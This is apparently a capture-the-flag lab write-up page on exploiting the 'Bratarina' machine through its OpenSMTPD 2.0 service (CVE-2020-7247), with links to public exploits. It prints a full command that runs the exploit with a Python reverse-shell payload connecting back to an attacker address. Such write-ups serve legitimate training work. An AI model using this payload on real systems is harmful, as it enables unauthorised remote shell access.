> For the complete documentation index, see [llms.txt](https://lyethar.gitbook.io/bratarina/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lyethar.gitbook.io/bratarina/exploitation.md).

# Exploitation

![](/files/JfSSLAWeAqFqFnTWCMrS)

![](/files/0VQR0xZbgOyitXg2wL6R)

According to our scans Bratarina is running OpenSMTPD 2.0 which makes this machine a good candidate for the RCE.&#x20;

{% embed url="<https://www.exploit-db.com/exploits/47984>" %}

{% embed url="<https://github.com/QTranspose/CVE-2020-7247-exploit>" %}

In order to get the exploit to work we had to use the principle of using the same thing, just in different ways.&#x20;

![](/files/fq24Crav7So6Bz1uZfqp)

I ran the following command to get a reverse shell.&#x20;

```
ython3 /usr/share/exploitdb/exploits/linux/remote/47984.py 192.168.242.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.242\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'
```

I also found this exploit from github which seems to be really good as well.&#x20;

![](/files/s7dKe1TivnrLzqemdr8B)
